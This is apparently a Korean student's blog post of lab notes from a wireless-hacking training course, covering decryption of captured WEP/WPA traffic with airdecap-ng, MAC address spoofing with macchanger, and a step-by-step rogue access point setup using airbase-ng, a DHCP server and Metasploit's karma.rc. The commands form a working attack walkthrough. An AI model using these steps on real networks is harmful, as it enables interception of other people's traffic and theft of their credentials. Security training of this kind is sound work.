3. 무선 네트워크 해킹 실습
5) WEP/WPA Decrypt
▣ WEP Decrypt
- 패킷을 모음
- airdecap-ng -w [아스키문자 password] [캡처한 파일명]
☞ 아스키문자 패스워드는 1234면 31:32:33:34 로 넣어야함.
☞ ~~~dec.cap 파일 생성됨.
- WireShark로 cap 파일을 열어서 확인가능.
- 90% ~ 100% 확률로 복호화
▣ WPA Decrypt
- 패킷을 모음.
- airdecap-ng -p [10진수 password] [캡처한 파일명] -e "[SSID]"
- 복호화 확률이 낮음.
☞ hello-01.cap 내용
☞ 복호화 후 생긴 파일 확인
☞ 복호화된 hello-01-dec.cap 내용
6) MAC Spoofing
▣ MAC Spoofing
- wlan0 사용하지 않음 설정
# ifconfig wlan0 down
- MAC 주소 변경
# macchanger -m [변경할 MAC 주소] wlan0
- wlan0 다시 사용 설정
# ifconfig wlan0 up
7) Phising
▣ Phising 3가지 방법
- 그냥
- 신호를 세게
- probe request 이용
▣ Phising
- eth0에 연결되어 있는 칼리 리눅스 자체를 DHCP 서버로 사용.
- 모니터 모드인 mon0를 이용하여 at0를 생성.
1. dhclient eth0
2. karma.rc & dhcpd.conf & isc-dhcp-server 다운로드.
☞ isc-dhcp-server.deb (설치파일) 설치법 : # dpkg -i isc-dhcp-server.deb
3. cp dhcpd.conf /etc/dhcp
4. airbase-ng -y -c [채널번호] -e "[사용할 SSID]" -v mon0
☞ -y : 그냥 phising용 ap 만들것임. (-P : Probe Request 용 AP)
☞ at0가 생성되며 비콘을 뿌림.(종료하지 말 것)
5. ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
6. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
7. ifconfig at0
8. /etc/init.d/isc-dhcp-server start
☞ DHCP 서버 시작
9. msfconsole -r karma.rc
☞ karma.rc는 취약점 코드 (로딩 페이지를 띄울것임)
- 로딩페이지는 뜨나 인터넷을 연결안해줬기 때문에 인터넷이 되지는 않음.
i2sec 대구지점 23기 수료생.
'해킹&보안 > 무선 해킹&보안' 카테고리의 다른 글
[D+3] 무선 네트워크 해킹 실습 (1) (0) | 2017.04.24 |
---|---|
[D+2] 무선 네트워크 시스템 (0) | 2017.04.23 |
[D+1] 무선 네트워크 개요 (0) | 2017.04.18 |